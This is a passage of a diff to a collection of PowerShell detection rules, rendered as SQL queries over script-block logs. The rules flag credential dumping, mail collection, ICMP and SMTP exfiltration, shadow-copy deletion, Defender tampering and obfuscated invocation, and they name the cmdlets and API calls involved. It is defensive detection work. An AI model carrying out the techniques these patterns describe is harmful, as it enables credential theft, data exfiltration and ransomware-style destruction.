'%CreateThread%' ESCAPE '\\' OR ScriptBlockText LIKE '%CreateUserThread%' ESCAPE '\\' OR ScriptBlockText LIKE '%DangerousGetHandle%' ESCAPE '\\' OR ScriptBlockText LIKE '%DuplicateTokenEx%' ESCAPE '\\' OR ScriptBlockText LIKE '%EnumerateSecurityPackages%' ESCAPE '\\' OR ScriptBlockText LIKE '%FreeLibrary%' ESCAPE '\\' OR ScriptBlockText LIKE '%GetDelegateForFunctionPointer%' ESCAPE '\\' OR ScriptBlockText LIKE '%GetLogonSessionData%' ESCAPE '\\' OR ScriptBlockText LIKE '%GetModuleHandle%' ESCAPE '\\' OR ScriptBlockText LIKE '%GetProcAddress%' ESCAPE '\\' OR ScriptBlockText LIKE '%GetProcessHandle%' ESCAPE '\\' OR ScriptBlockText LIKE '%GetTokenInformation%' ESCAPE '\\' OR ScriptBlockText LIKE '%ImpersonateLoggedOnUser%' ESCAPE '\\' OR ScriptBlockText LIKE '%kernel32%' ESCAPE '\\' OR ScriptBlockText LIKE '%LoadLibrary%' ESCAPE '\\' OR ScriptBlockText LIKE '%memcpy%' ESCAPE '\\' OR ScriptBlockText LIKE '%MiniDumpWriteDump%' ESCAPE '\\' OR ScriptBlockText LIKE '%msvcrt%' ESCAPE '\\' OR ScriptBlockText LIKE '%ntdll%' ESCAPE '\\' OR ScriptBlockText LIKE '%OpenDesktop%' ESCAPE '\\' OR ScriptBlockText LIKE '%OpenProcess%' ESCAPE '\\' OR ScriptBlockText LIKE '%OpenProcessToken%' ESCAPE '\\' OR ScriptBlockText LIKE '%OpenThreadToken%' ESCAPE '\\' OR ScriptBlockText LIKE '%OpenWindowStation%' ESCAPE '\\' OR ScriptBlockText LIKE '%QueueUserApc%' ESCAPE '\\' OR ScriptBlockText LIKE '%ReadProcessMemory%' ESCAPE '\\' OR ScriptBlockText LIKE '%RevertToSelf%' ESCAPE '\\' OR ScriptBlockText LIKE '%RtlCreateUserThread%' ESCAPE '\\' OR ScriptBlockText LIKE '%secur32%' ESCAPE '\\' OR ScriptBlockText LIKE '%SetThreadToken%' ESCAPE '\\' OR ScriptBlockText LIKE '%VirtualAlloc%' ESCAPE '\\' OR ScriptBlockText LIKE '%VirtualFree%' ESCAPE '\\' OR ScriptBlockText LIKE '%VirtualProtect%' ESCAPE '\\' OR ScriptBlockText LIKE '%WaitForSingleObject%' ESCAPE '\\' OR ScriptBlockText LIKE '%WriteInt32%' ESCAPE '\\' OR ScriptBlockText LIKE '%WriteProcessMemory%' ESCAPE '\\' OR ScriptBlockText LIKE '%ZeroFreeGlobalAllocUnicode%' ESCAPE '\\') AND NOT ((ScriptBlockText LIKE '# Copyright 2016 Amazon.com, Inc. or its affiliates.%' ESCAPE '\\' AND ScriptBlockText LIKE '%function Import-SerialPortUtil %' ESCAPE '\\')))" + ], + "filename": "posh_ps_accessing_win_api.yml" + }, + { + "title": "Powershell Local Email Collection", + "id": "2837e152-93c8-43d2-85ba-c3cd3c2ae614", + "status": "test", + "description": "Adversaries may target user email on local systems to collect sensitive information.\nFiles containing email data can be acquired from a users local system, such as Outlook storage or cache files.\n", "author": "frack113", "tags": [ "attack.collection", - "attack.t1074.001" + "attack.t1114.001" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Compress-Archive %' ESCAPE '\\' AND ScriptBlockText LIKE '% -Path %' ESCAPE '\\' AND ScriptBlockText LIKE '% -DestinationPath %' ESCAPE '\\' AND ScriptBlockText LIKE '%$env:TEMP\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Get-Inbox.ps1%' ESCAPE '\\' OR ScriptBlockText LIKE '%Microsoft.Office.Interop.Outlook%' ESCAPE '\\' OR ScriptBlockText LIKE '%Microsoft.Office.Interop.Outlook.olDefaultFolders%' ESCAPE '\\' OR ScriptBlockText LIKE '%-comobject outlook.application%' ESCAPE '\\'))" ], - "filename": "posh_ps_susp_zip_compress.yml" + "filename": "posh_ps_susp_mail_acces.yml" }, { - "title": "Potential Data Exfiltration Via Audio File", - "id": "e4f93c99-396f-47c8-bb0f-201b1fa69034", + "title": "Import PowerShell Modules From Suspicious Directories", + "id": "21f9162c-5f5d-4b01-89a8-b705bd7d10ab", "status": "experimental", - "description": "Detects potential exfiltration attempt via audio file using PowerShell", + "description": "Detects powershell scripts that import modules from suspicious directories", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.exfiltration" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%[System.Math]::%' ESCAPE '\\' AND ScriptBlockText LIKE '%[IO.FileMode]::%' ESCAPE '\\' AND ScriptBlockText LIKE '%BinaryWriter%' ESCAPE '\\' AND ScriptBlockText LIKE '%0x52%' ESCAPE '\\' AND ScriptBlockText LIKE '%0x49%' ESCAPE '\\' AND ScriptBlockText LIKE '%0x46%' ESCAPE '\\' AND ScriptBlockText LIKE '%0x57%' ESCAPE '\\' AND ScriptBlockText LIKE '%0x41%' ESCAPE '\\' AND ScriptBlockText LIKE '%0x56%' ESCAPE '\\' AND ScriptBlockText LIKE '%0x45%' ESCAPE '\\' AND ScriptBlockText LIKE '%0xAC%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Import-Module \"$Env:Temp\\\\%' ESCAPE '\\' OR ScriptBlockText LIKE '%Import-Module ''$Env:Temp\\\\%' ESCAPE '\\' OR ScriptBlockText LIKE '%Import-Module $Env:Temp\\\\%' ESCAPE '\\' OR ScriptBlockText LIKE '%Import-Module \"$Env:Appdata\\\\%' ESCAPE '\\' OR ScriptBlockText LIKE '%Import-Module ''$Env:Appdata\\\\%' ESCAPE '\\' OR ScriptBlockText LIKE '%Import-Module $Env:Appdata\\\\%' ESCAPE '\\' OR ScriptBlockText LIKE '%Import-Module C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR ScriptBlockText LIKE '%ipmo \"$Env:Temp\\\\%' ESCAPE '\\' OR ScriptBlockText LIKE '%ipmo ''$Env:Temp\\\\%' ESCAPE '\\' OR ScriptBlockText LIKE '%ipmo $Env:Temp\\\\%' ESCAPE '\\' OR ScriptBlockText LIKE '%ipmo \"$Env:Appdata\\\\%' ESCAPE '\\' OR ScriptBlockText LIKE '%ipmo ''$Env:Appdata\\\\%' ESCAPE '\\' OR ScriptBlockText LIKE '%ipmo $Env:Appdata\\\\%' ESCAPE '\\' OR ScriptBlockText LIKE '%ipmo C:\\\\Users\\\\Public\\\\%' ESCAPE '\\'))" ], - "filename": "posh_ps_audio_exfiltration.yml" + "filename": "posh_ps_import_module_susp_dirs.yml" }, { - "title": "Invoke-Obfuscation Via Use Clip - Powershell", - "id": "db92dd33-a3ad-49cf-8c2c-608c3e30ace0", - "status": "experimental", - "description": "Detects Obfuscated Powershell via use Clip.exe in Scripts", - "author": "Nikita Nazarov, oscd.community", + "title": "Suspicious PowerShell Invocations - Generic", + "id": "ed965133-513f-41d9-a441-e38076a0798f", + "status": "test", + "description": "Detects suspicious PowerShell invocation command parameters", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027", "attack.execution", "attack.t1059.001" ], "falsepositives": [ - "Unknown" + "Very special / sneaky PowerShell scripts" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText REGEXP '(?i).*?echo.*clip.*&&.*(Clipboard|i`?n`?v`?o`?k`?e`?).*')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '% -enc %' ESCAPE '\\' OR ScriptBlockText LIKE '% -EncodedCommand %' ESCAPE '\\' OR ScriptBlockText LIKE '% -ec %' ESCAPE '\\') AND (ScriptBlockText LIKE '% -w hidden %' ESCAPE '\\' OR ScriptBlockText LIKE '% -window hidden %' ESCAPE '\\' OR ScriptBlockText LIKE '% -windowstyle hidden %' ESCAPE '\\' OR ScriptBlockText LIKE '% -w 1 %' ESCAPE '\\') AND (ScriptBlockText LIKE '% -noni %' ESCAPE '\\' OR ScriptBlockText LIKE '% -noninteractive %' ESCAPE '\\'))" ], - "filename": "posh_ps_invoke_obfuscation_via_use_clip.yml" + "filename": "posh_ps_susp_invocation_generic.yml" }, { - "title": "Deletion of Volume Shadow Copies via WMI with PowerShell - PS Script", - "id": "c1337eb8-921a-4b59-855b-4ba188ddcc42", + "title": "Tamper Windows Defender Remove-MpPreference - ScriptBlockLogging", + "id": "ae2bdd58-0681-48ac-be7f-58ab4e593458", "status": "experimental", - "description": "Detects deletion of Windows Volume Shadow Copies with PowerShell code and Get-WMIObject. This technique is used by numerous ransomware families such as Sodinokibi/REvil", - "author": "Tim Rauch", + "description": "Detects attempts to remove windows defender configuration using the 'MpPreference' cmdlet", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.impact", - "attack.t1490" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Unknown" + "Legitimate PowerShell scripts" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Get-WmiObject%' ESCAPE '\\' OR ScriptBlockText LIKE '%gwmi%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-CimInstance%' ESCAPE '\\' OR ScriptBlockText LIKE '%gcim%' ESCAPE '\\') AND ScriptBlockText LIKE '%Win32\\_Shadowcopy%' ESCAPE '\\' AND (ScriptBlockText LIKE '%.Delete()%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-WmiObject%' ESCAPE '\\' OR ScriptBlockText LIKE '%rwmi%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-CimInstance%' ESCAPE '\\' OR ScriptBlockText LIKE '%rcim%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Remove-MpPreference%' ESCAPE '\\' AND (ScriptBlockText LIKE '%-ControlledFolderAccessProtectedFolders %' ESCAPE '\\' OR ScriptBlockText LIKE '%-AttackSurfaceReductionRules\\_Ids %' ESCAPE '\\' OR ScriptBlockText LIKE '%-AttackSurfaceReductionRules\\_Actions %' ESCAPE '\\' OR ScriptBlockText LIKE '%-CheckForSignaturesBeforeRunningScan %' ESCAPE '\\'))" ], - "filename": "posh_ps_susp_win32_shadowcopy_deletion.yml" + "filename": "posh_ps_tamper_defender_remove_mppreference.yml" }, { - "title": "Invoke-Obfuscation Via Stdin - Powershell", - "id": "86b896ba-ffa1-4fea-83e3-ee28a4c915c7", + "title": "Windows PowerShell Upload Web Request", + "id": "d2e3f2f6-7e09-4bf2-bc5d-90186809e7fb", "status": "experimental", - "description": "Detects Obfuscated Powershell via Stdin in Scripts", - "author": "Nikita Nazarov, oscd.community", + "description": "Detects the use of various web request POST or PUT methods (including aliases) via Windows PowerShell command", + "author": "frack113", + "tags": [ + "attack.exfiltration", + "attack.t1020" + ], + "falsepositives": [ + "Legitimate script" + ], + "level": "medium", + "rule": [ + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Invoke-WebRequest%' ESCAPE '\\' OR ScriptBlockText LIKE '%iwr %' ESCAPE '\\') AND ScriptBlockText LIKE '%-Method %' ESCAPE '\\' AND (ScriptBlockText LIKE '% Put %' ESCAPE '\\' OR ScriptBlockText LIKE '% Post %' ESCAPE '\\'))" + ], + "filename": "posh_ps_upload.yml" + }, + { + "title": "WMImplant Hack Tool", + "id": "8028c2c3-e25a-46e3-827f-bbb5abf181d7", + "status": "test", + "description": "Detects parameters used by WMImplant", + "author": "NVISO", "tags": [ - "attack.defense_evasion", - "attack.t1027", "attack.execution", + "attack.t1047", "attack.t1059.001" ], + "falsepositives": [ + "Administrative scripts that use the same keywords." + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%WMImplant%' ESCAPE '\\' OR ScriptBlockText LIKE '% change\\_user %' ESCAPE '\\' OR ScriptBlockText LIKE '% gen\\_cli %' ESCAPE '\\' OR ScriptBlockText LIKE '% command\\_exec %' ESCAPE '\\' OR ScriptBlockText LIKE '% disable\\_wdigest %' ESCAPE '\\' OR ScriptBlockText LIKE '% disable\\_winrm %' ESCAPE '\\' OR ScriptBlockText LIKE '% enable\\_wdigest %' ESCAPE '\\' OR ScriptBlockText LIKE '% enable\\_winrm %' ESCAPE '\\' OR ScriptBlockText LIKE '% registry\\_mod %' ESCAPE '\\' OR ScriptBlockText LIKE '% remote\\_posh %' ESCAPE '\\' OR ScriptBlockText LIKE '% sched\\_job %' ESCAPE '\\' OR ScriptBlockText LIKE '% service\\_mod %' ESCAPE '\\' OR ScriptBlockText LIKE '% process\\_kill %' ESCAPE '\\' OR ScriptBlockText LIKE '% active\\_users %' ESCAPE '\\' OR ScriptBlockText LIKE '% basic\\_info %' ESCAPE '\\' OR ScriptBlockText LIKE '% power\\_off %' ESCAPE '\\' OR ScriptBlockText LIKE '% vacant\\_system %' ESCAPE '\\' OR ScriptBlockText LIKE '% logon\\_events %' ESCAPE '\\'))" + ], + "filename": "posh_ps_wmimplant.yml" + }, + { + "title": "Execution via CL_Mutexverifiers.ps1", + "id": "39776c99-1c7b-4ba0-b5aa-641525eee1a4", + "status": "test", + "description": "Detects Execution via runAfterCancelProcess in CL_Mutexverifiers.ps1 module", + "author": "oscd.community, Natalia Shornikova", + "tags": [ + "attack.defense_evasion", + "attack.t1216" + ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText REGEXP '(?i).*(set).*&&\\s?set.*(environment|invoke|\\$\\{?input).*&&.*\"')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%CL\\_Mutexverifiers.ps1%' ESCAPE '\\' AND ScriptBlockText LIKE '%runAfterCancelProcess%' ESCAPE '\\')" ], - "filename": "posh_ps_invoke_obfuscation_via_stdin.yml" + "filename": "posh_ps_cl_mutexverifiers_lolscript.yml" }, { - "title": "Suspicious FromBase64String Usage On Gzip Archive - Ps Script", - "id": "df69cb1d-b891-4cd9-90c7-d617d90100ce", - "status": "experimental", - "description": "Detects attempts of decoding a base64 Gzip archive in a PowerShell script. This technique is often used as a method to load malicious content into memory afterward.", + "title": "Dump Credentials from Windows Credential Manager With PowerShell", + "id": "99c49d9c-34ea-45f7-84a7-4751ae6b2cbc", + "status": "test", + "description": "Adversaries may search for common password storage locations to obtain user credentials.\nPasswords are stored in several places on a system, depending on the operating system or application holding the credentials.\n", "author": "frack113", + "tags": [ + "attack.credential_access", + "attack.t1555" + ], "falsepositives": [ - "Legitimate administrative script" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%FromBase64String%' ESCAPE '\\' AND ScriptBlockText LIKE '%MemoryStream%' ESCAPE '\\' AND ScriptBlockText LIKE '%H4sI%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ((ScriptBlockText LIKE '%Get-PasswordVaultCredentials%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-CredManCreds%' ESCAPE '\\') OR (ScriptBlockText LIKE '%New-Object%' ESCAPE '\\' AND ScriptBlockText LIKE '%Windows.Security.Credentials.PasswordVault%' ESCAPE '\\') OR (ScriptBlockText LIKE '%New-Object%' ESCAPE '\\' AND ScriptBlockText LIKE '%Microsoft.CSharp.CSharpCodeProvider%' ESCAPE '\\' AND ScriptBlockText LIKE '%[System.Runtime.InteropServices.RuntimeEnvironment]::GetRuntimeDirectory())%' ESCAPE '\\' AND ScriptBlockText LIKE '%Collections.ArrayList%' ESCAPE '\\' AND ScriptBlockText LIKE '%System.CodeDom.Compiler.CompilerParameters%' ESCAPE '\\')))" ], - "filename": "posh_ps_frombase64string_archive.yml" + "filename": "posh_ps_dump_password_windows_credential_manager.yml" }, { - "title": "Suspicious Get-ADReplAccount", - "id": "060c3ef1-fd0a-4091-bf46-e7d625f60b73", + "title": "Suspicious Mount-DiskImage", + "id": "29e1c216-6408-489d-8a06-ee9d151ef819", "status": "test", - "description": "The DSInternals PowerShell Module exposes several internal features of Active Directory and Azure Active Directory.\nThese include FIDO2 and NGC key auditing, offline ntds.dit file manipulation, password auditing, DC recovery from IFM backups and password hash calculation.\n", + "description": "Adversaries may abuse container files such as disk image (.iso, .vhd) file formats to deliver malicious payloads that may not be tagged with MOTW.", "author": "frack113", "tags": [ - "attack.credential_access", - "attack.t1003.006" + "attack.defense_evasion", + "attack.t1553.005" ], "falsepositives": [ "Legitimate PowerShell scripts" ], - "level": "medium", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Get-ADReplAccount%' ESCAPE '\\' AND ScriptBlockText LIKE '%-All %' ESCAPE '\\' AND ScriptBlockText LIKE '%-Server %' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Mount-DiskImage %' ESCAPE '\\' AND ScriptBlockText LIKE '%-ImagePath %' ESCAPE '\\')" ], - "filename": "posh_ps_get_adreplaccount.yml" + "filename": "posh_ps_susp_mount_diskimage.yml" }, { - "title": "Computer Discovery And Export Via Get-ADComputer Cmdlet - PowerShell", - "id": "db885529-903f-4c5d-9864-28fe199e6370", - "status": "experimental", - "description": "Detects usage of the Get-ADComputer cmdlet to collect computer information and output it to a file", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "PowerShell ICMP Exfiltration", + "id": "4c4af3cd-2115-479c-8193-6b8bfce9001c", + "status": "test", + "description": "Detects Exfiltration Over Alternative Protocol - ICMP. Adversaries may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel.", + "author": "Bartlomiej Czyz @bczyz1, oscd.community", "tags": [ - "attack.discovery", - "attack.t1033" + "attack.exfiltration", + "attack.t1048.003" ], "falsepositives": [ - "Legitimate admin scripts may use the same technique, it's better to exclude specific computers or users who execute these commands or scripts often" + "Legitimate usage of System.Net.NetworkInformation.Ping class" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Get-ADComputer %' ESCAPE '\\' AND ScriptBlockText LIKE '% -Filter \\*' ESCAPE '\\' AND (ScriptBlockText LIKE '% | Select %' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-File%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-Content%' ESCAPE '\\' OR ScriptBlockText LIKE '%Add-Content%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%New-Object%' ESCAPE '\\' AND ScriptBlockText LIKE '%System.Net.NetworkInformation.Ping%' ESCAPE '\\' AND ScriptBlockText LIKE '%.Send(%' ESCAPE '\\')" ], - "filename": "posh_ps_computer_discovery_get_adcomputer.yml" + "filename": "posh_ps_icmp_exfiltration.yml" }, { - "title": "Powershell Exfiltration Over SMTP", - "id": "9a7afa56-4762-43eb-807d-c3dc9ffe211b", - "status": "experimental", - "description": "Adversaries may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel.\nThe data may also be sent to an alternate network location from the main command and control server.\n", - "author": "frack113", + "title": "Deletion of Volume Shadow Copies via WMI with PowerShell - PS Script", + "id": "c1337eb8-921a-4b59-855b-4ba188ddcc42", + "status": "experimental", + "description": "Detects deletion of Windows Volume Shadow Copies with PowerShell code and Get-WMIObject. This technique is used by numerous ransomware families such as Sodinokibi/REvil", + "author": "Tim Rauch", "tags": [ - "attack.exfiltration", - "attack.t1048.003" + "attack.impact", + "attack.t1490" ], "falsepositives": [ - "Legitimate script" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ScriptBlockText LIKE '%Send-MailMessage%' ESCAPE '\\' AND NOT (ScriptBlockText LIKE '%CmdletsToExport%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Get-WmiObject%' ESCAPE '\\' OR ScriptBlockText LIKE '%gwmi%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-CimInstance%' ESCAPE '\\' OR ScriptBlockText LIKE '%gcim%' ESCAPE '\\') AND ScriptBlockText LIKE '%Win32\\_Shadowcopy%' ESCAPE '\\' AND (ScriptBlockText LIKE '%.Delete()%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-WmiObject%' ESCAPE '\\' OR ScriptBlockText LIKE '%rwmi%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-CimInstance%' ESCAPE '\\' OR ScriptBlockText LIKE '%rcim%' ESCAPE '\\'))" ], - "filename": "posh_ps_send_mailmessage.yml" + "filename": "posh_ps_susp_win32_shadowcopy_deletion.yml" }, { - "title": "Suspicious PowerShell Download - Powershell Script", - "id": "403c2cc0-7f6b-4925-9423-bfa573bed7eb", + "title": "Suspicious Get-WmiObject", + "id": "0332a266-b584-47b4-933d-a00b103e1b37", "status": "experimental", - "description": "Detects suspicious PowerShell download command", - "author": "Florian Roth (Nextron Systems)", + "description": "The infrastructure for management data and operations that enables local and remote management of Windows personal computers and servers", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.persistence", + "attack.t1546" ], "falsepositives": [ - "PowerShell scripts that download content from the Internet" + "Legitimate PowerShell scripts" ], - "level": "medium", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%System.Net.WebClient%' ESCAPE '\\' AND (ScriptBlockText LIKE '%.DownloadFile(%' ESCAPE '\\' OR ScriptBlockText LIKE '%.DownloadString(%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText LIKE '%Get-WmiObject%' ESCAPE '\\' OR ScriptBlockText LIKE '%gwmi%' ESCAPE '\\') AND NOT ((Path LIKE '%\\\\CL\\_Utility.ps1' ESCAPE '\\' AND ScriptBlockText LIKE '%function Get-FreeSpace%' ESCAPE '\\' AND ScriptBlockText LIKE '%SELECT % FROM Win32\\_LogicalDisk WHERE MediaType=12%' ESCAPE '\\')))" ], - "filename": "posh_ps_susp_download.yml" + "filename": "posh_ps_susp_gwmi.yml" }, { - "title": "Create Volume Shadow Copy with Powershell", - "id": "afd12fed-b0ec-45c9-a13d-aa86625dac81", - "status": "test", - "description": "Adversaries may attempt to access or create a copy of the Active Directory domain database in order to steal credential information", + "title": "Zip A Folder With PowerShell For Staging In Temp - PowerShell Script", + "id": "b7a3c9a3-09ea-4934-8864-6a32cacd98d9", + "status": "experimental", + "description": "Use living off the land tools to zip a file and stage it in the Windows temporary folder for later exfiltration", "author": "frack113", "tags": [ - "attack.credential_access", - "attack.t1003.003" + "attack.collection", + "attack.t1074.001" ], "falsepositives": [ - "Legitimate PowerShell scripts" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%win32\\_shadowcopy%' ESCAPE '\\' AND ScriptBlockText LIKE '%).Create(%' ESCAPE '\\' AND ScriptBlockText LIKE '%ClientAccessible%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Compress-Archive %' ESCAPE '\\' AND ScriptBlockText LIKE '% -Path %' ESCAPE '\\' AND ScriptBlockText LIKE '% -DestinationPath %' ESCAPE '\\' AND ScriptBlockText LIKE '%$env:TEMP\\\\%' ESCAPE '\\')" ], - "filename": "posh_ps_create_volume_shadow_copy.yml" + "filename": "posh_ps_susp_zip_compress.yml" }, { "title": "Unsigned AppX Installation Attempt Using Add-AppxPackage - PsScript", @@ -7998,6674 +7627,6720 @@ "filename": "posh_ps_install_unsigned_appx_packages.yml" }, { - "title": "Invoke-Obfuscation Obfuscated IEX Invocation - PowerShell", - "id": "1b9dc62e-6e9e-42a3-8990-94d7a10007f7", + "title": "Usage Of Web Request Commands And Cmdlets - ScriptBlock", + "id": "1139d2e2-84b1-4226-b445-354492eba8ba", "status": "experimental", - "description": "Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the following code block \\u2014", - "author": "Daniel Bohannon (@Mandiant/@FireEye), oscd.community", + "description": "Detects the use of various web request commands with commandline tools and Windows PowerShell cmdlets (including aliases) via PowerShell scriptblock logs", + "author": "James Pemberton / @4A616D6573", "tags": [ - "attack.defense_evasion", - "attack.t1027", "attack.execution", "attack.t1059.001" ], "falsepositives": [ - "Unknown" + "Use of Get-Command and Get-Help modules to reference Invoke-WebRequest and Start-BitsTransfer." ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText REGEXP '\\$PSHome\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$PSHome\\[' OR ScriptBlockText REGEXP '\\$ShellId\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$ShellId\\[' OR ScriptBlockText REGEXP '\\$env:Public\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$env:Public\\[' OR ScriptBlockText REGEXP '\\$env:ComSpec\\[(\\s*\\d{1,3}\\s*,){2}' OR ScriptBlockText REGEXP '\\*mdr\\*\\W\\s*\\)\\.Name' OR ScriptBlockText REGEXP '\\$VerbosePreference\\.ToString\\('))" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText LIKE '%Invoke-WebRequest%' ESCAPE '\\' OR ScriptBlockText LIKE '%iwr %' ESCAPE '\\' OR ScriptBlockText LIKE '%wget %' ESCAPE '\\' OR ScriptBlockText LIKE '%curl %' ESCAPE '\\' OR ScriptBlockText LIKE '%Net.WebClient%' ESCAPE '\\' OR ScriptBlockText LIKE '%Start-BitsTransfer%' ESCAPE '\\' OR ScriptBlockText LIKE '%Resume-BitsTransfer%' ESCAPE '\\' OR ScriptBlockText LIKE '%[System.Net.WebRequest]::create%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-RestMethod%' ESCAPE '\\' OR ScriptBlockText LIKE '%WinHttp.WinHttpRequest%' ESCAPE '\\') AND NOT (Path LIKE 'C:\\\\Packages\\\\Plugins\\\\Microsoft.GuestConfiguration.ConfigurationforWindows\\\\%' ESCAPE '\\'))" ], - "filename": "posh_ps_invoke_obfuscation_obfuscated_iex.yml" + "filename": "posh_ps_web_request_cmd_and_cmdlets.yml" }, { - "title": "Invoke-Obfuscation RUNDLL LAUNCHER - PowerShell", - "id": "e6cb92b4-b470-4eb8-8a9d-d63e8583aae0", + "title": "Suspicious GPO Discovery With Get-GPO", + "id": "eb2fd349-ec67-4caa-9143-d79c7fb34441", "status": "experimental", - "description": "Detects Obfuscated Powershell via RUNDLL LAUNCHER", - "author": "Timur Zinniatullin, oscd.community", + "description": "Detect use of Get-GPO to get one GPO or all the GPOs in a domain.", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.discovery", + "attack.t1615" ], "falsepositives": [ - "Unknown" + "Legitimate PowerShell scripts" ], - "level": "medium", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%rundll32.exe%' ESCAPE '\\' AND ScriptBlockText LIKE 